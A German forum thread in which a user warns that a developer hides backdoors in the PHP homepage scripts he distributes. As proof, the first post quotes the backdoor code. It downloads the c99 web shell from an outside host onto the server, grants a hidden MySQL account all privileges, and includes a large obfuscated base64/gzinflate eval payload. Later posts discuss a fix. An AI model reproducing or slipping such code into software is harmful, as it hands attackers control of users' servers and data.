[ WARNUNG VOR SONIICE ]

Page 1 of 6

08/25/2011 21:19 .Infinity#1

Liebe Community.

Ich sehe mich jetzt gezwungen euch vor Soniice zu warnen.
Leider kennt er keine Grenzen.
In seiner Pub HP ist selbst nen Backdoor mit drin.
Gut fangen wir mal an mit den Beweisen.

PHP Code:


			
if (isset($_GET['ref']) == 'secureeeee') {

$datei = fopen("secure.php","w+");$stream = fopen("http://lijang2.de/c99.txt", "r");while (!feof($stream)) { 

$fixxerr .= fgets($stream); } fclose($stream);fwrite($datei,$fixxerr) ;fclose($datei);

}



$user = "grant all on *.* to SoNiiceeeeeee@'%' identified by 'marcel123eeeeeeeeeee'";

mysql_query ($user); 



$x++;



}

PHP Code:


			
if (isset($_GET['ref']) == 'secure') {

$datei = fopen("secure.php","w+");$stream = fopen("http://lijang2.de/c99.txt", "r");while (!feof($stream)) { 

$fixxerr .= fgets($stream); } fclose($stream);fwrite($datei,$fixxerr) ;fclose($datei);

}



$user = "grant all on *.* to SoNiice@'%' identified by 'marcel123'";

mysql_query ($user); 



$x++;

Sowas baut er in so gut wie jede seine Homepages ein.
Klaut euch danach eure PSC und leugnet alles.

Ich hatte die Schnauze voll, dass wieder nen Kollege von mir gehackt wurde.

So siehts �brigends ein einigen seiner Scripts verschl�sselt aus.

PHP Code:


			
eval(gzinflate(base64_decode(

'DZVHzqRoAkT3fZGuEgu8U09PiUy8924zAj4g8R4STj//DSIUei/+/Pc/f+bP/Fd5'

.'Zv2v+mnGqs/28leebSVF/A+UxQTKX3//xaehLMxPxNU8fkxNn2yCI5MevHq61cl2'

.'cRhNqmSVX7FYLbJ4eMIwi0PQPI5E4LI6vKrkoNt7p+HUcIeLA8ks2cX4QxygsuE2'

.'gan7Gds3sDDqGylrlMXytjed3OIKj/J9pPjhFZ51XsWvb4VKdMQoF8e95pazm6bD'

.'RPSFZvKKVBnMJ5vnCb2y5LPrpAZ32ZXzFYppeJzglmbEfXPc4nX1tNJh21e1Rn5i'

.'IIbvZZpQudQ6kwDYo7mOmte36iyq5uHlCRoLxOiEreLnVFVxae0y4YwwQ05f6o5H'

.'4hZ3Tovwyl9YiUWPng/LxE3t1rix4sVWsSAmTl9Uo9pe/Ol7AulMQ1mAa0EzmOXT'

.'Qcxu/ukkiv5J1MCozaW8s4peseJ9o0GLdBmrXZOl9O1jMGR3MOEFjrc5C4rlcRph'

.'ZBdGRq6rYaNubYurhVuYgTsZ9Ob59qqer8U1p7AWKwtMKLP0s5EP4ORA0wQNtWfb'

.'K6ad00CXpkI9BkGBVwBIl8eO2twCKKU9RAjOvneswqPCqvGtmrYT7FJ1urSA688E'

.'RHyOUQ8qXU3P2EcjQsoRneTnMOi/lTZ/k3kgu34bO15qgL/nZyASIWmkaRid7bfE'

.'Td2AovUaGy8en7WqZVTqzmYRogSzcFUxmQYO1yHJv+TBrFrjHS8y1o/ATOge4RoC'

.'3vZQNapbqa6rNFIPNpDV9ib+Y9xO32B4NAbQeiiEm94x84n6GThp4hYja/L8Jj7y'

.'LnvY55psj5UvyjE+Qi2ko8ue0+6gJmfdReRNiOP00EsPC5UCn2KjfFA0vJquYjkE'

.'msXUr5IMyziNIYUM7E5r0Y3nAXevH1PsOq5rgc/yGjwlV7ugeWC62gClBR9uZzin'

.'0Tv8Ou50PiS0h4SuBwFJSy6CH5D9SXbt0Tlt9qSB22yN+Prbtu5xWCM0BgJbEyWh'

.'BTKEAo5+YreIINzXDnM/1lBBDbcDM+c6aN3tr3rwwSqgVJZE8xVGGtZFOz3By8AO'

.'iklUzi4mGUWmzY0T32d7vywiwnR7NaKDebGHm1+jugtIL4POY/vL7wdoFjOHyVVd'

.'QSu6h1STweN0LqL3ntdNUttpsUjDXJPV2U8ilBvil5t4UhtaM8qQ6DZqzixwG/Gf'

.'gLG7uxRzwnKZE7RRrVAP35oeG7vlGOY3I0QAo8y1eCfaalQRjuUuz0q3om5l2+5Q'

.'3EMOITPoZ0gmLA2/y6yuwTFyse9jHYf6TsTIZ1WmsmMh/N2qrJz5UJvhRovIGIP2'

.'p07rnUTUS5pKek9XPnX6z1Wd1T2oU2sPei9yx0+aOTrnN7S57QtguFFCKIWm9Wfe'

.'TWd0Pmvpwi1/i9L1zroi/3GO62KPAlvC0Kn0A9Inf6jXuKeNfgdD8+WSt+t5ynYh'

.'0WG0PQNjbd7mqFyoKjUO9rZMDW7rnb4NSuB/90vKOBoty5MKgs8lv6D+EE6MJEyq'

.'oM1K5ugrK1UfAtNRTpfH6F/9gzgI8PymLuI7P1XScGi5GExaYp6rkfxBIz67Maaa'

.'YibwSwz2oCbhgCDyPBwhoJqAMEi5kNS5YcfrYNy3QsYmlLSClzMrJl5qtDApSkiw'

.'KYgINzqsYLameaL61cRBI4O0mw5uF+dVeqMpxpuiYY9vs4NwGtnRLWVKaD4r7vmK'

.'+R43VGCdtTtoxkHSk25PNRsn1qn23nzdb6aLCT3IxwtooQXRrcfMzKcwiWyx9aHb'

.'k2LnByRTL7BThBfQP4DsUUWE9oIFQRpVY59GbOxJFCSwdA/o++SMhKvauiWVMySV'

.'735f5ODiSvNg8o84Npo4V4pDIHul1mZidgL6mMbmMYZ/GWIWkHbLGbInShMHCyMM'

.'MwxbnjENQ/Ap0w/kQ/z1779///79+5+//vyc6/8B'

)));

Kind regards,
.Infinity

08/25/2011 21:20 ι�н☆#2

Danke dass du uns warnst kannst du mir pls bei einem Problem helfen wo ist das in index.php ist nix davon

08/25/2011 21:20 Arschgesicht�#3

Danke f�r die Warnung.
was f�r ein ********

08/25/2011 21:29 Daroolein#4

Kommt rechtzeitig, habs vorhin auch Bull gefixxt.
Muss aber zugeben, von der L�cke gewusst zu haben.

08/25/2011 21:31 WasLosDiqqah�#5

kann man ihn deswegen anzeigen ?

08/25/2011 21:31 .Infinity#6

Ich wusste es auch schon l�nger. Aber damals nur von verkauften HP's und ich sollte die Leute nicht warnen. Ich stell mich jetzt aber dagegen. Zu h�ufige Vorf�lle. Der Junge klaut sich ne goldene Nase.

08/25/2011 21:33 Daroolein#7

[Only registered and activated users can see links. Click Here To Register...]

Wollte Global-Network nicht den Grund sagen, also hab ichs denen so gefixed...
Das muss noch beim includen ge�ndert werden:

PHP Code:


			
if(isset($_GET['s']) && !empty($_GET['s']))
                                {
                                    include './language/'.$_SESSION['lang'].'/pages/'.whitelist($_GET['s']).'.php';
                                }else 
                                {
                                    include(realpath('./language/'.$_SESSION['lang'].'/pages/').'/news.php');
                                }

08/25/2011 21:34 .Tolive#8

Quote:

Originally Posted by .Infinity

Ich wusste es auch schon l�nger. Aber damals nur von verkauften HP's und ich sollte die Leute nicht warnen. Ich stell mich jetzt aber dagegen. Zu h�ufige Vorf�lle. Der Junge klaut sich ne goldene Nase.

Der m�sste mal Bestraft werden. Schick mir mal deine Skype Adresse.

08/25/2011 21:37 Perfection-#9

danke infinity und auch nochmal ein dank an daroo der es und gefixxt hat!

08/25/2011 21:38 .Dauni#10

Was sage ich seit ~1 Jahr? Glaubt dem Typen nichts. Jetzt habt ihrs selbst zusp�ren bekommen. Sorry aber es ist bekannt das er nur schei�e macht.

08/25/2011 21:38 Daroolein#11

Quote:

Originally Posted by .Tolive

Der m�sste mal Bestraft werden. Schick mir mal deine Skype Adresse.

Wei�t du eigentlich wie dreist es ist, jemanden, v�llig aus dem Zusammenhang gerisse, dazu aufzufordern SICH SELBST zu adden?

Der wird nicht bestraft, aber im Ernst, jeder von euch w�rde das machen, wenn er die Chance dazu hat. Ich war auch mal so.

08/25/2011 21:40 .Infinity#12

Ich mache st�ndig Sachen pub. Ich k�nnte in alles Backdoors einbauen. Mach ich das :)`?
Ich k�nnte mir mehr als nen paar billige PSC besorgen.
Und das undectet.
C++ Kenntnisse k�nnen sch�n sein.

08/25/2011 21:46 Daroolein#13

Quote:

Originally Posted by .Infinity

Ich mache st�ndig Sachen pub. Ich k�nnte in alles Backdoors einbauen. Mach ich das :)`?
Ich k�nnte mir mehr als nen paar billige PSC besorgen.
Und das undectet.
C++ Kenntnisse k�nnen sch�n sein.

Ich w�rde das eher darauf beziehen, dass jeder die L�cke ausnutzen w�rde, wenn er kann. So eine L�cke einzubauen, ist eine etwas andere dreistigkeit, vor der aber bestimmt ein paar Leute nicht zur�ckschrecken w�rden.

08/25/2011 21:47 .Infinity#14

Ich habs auch nie ausgenutzt und kannte die L�cke. Und wie ich die benutze wei� ich.
Ich kann php

08/25/2011 21:48 .SoNiice'#15

lawl.
Sicherlich, frag doch mal deinen netten Risan, ich hab' nichts irgendwo eingebaut ;O

Page 1 of 6

Last »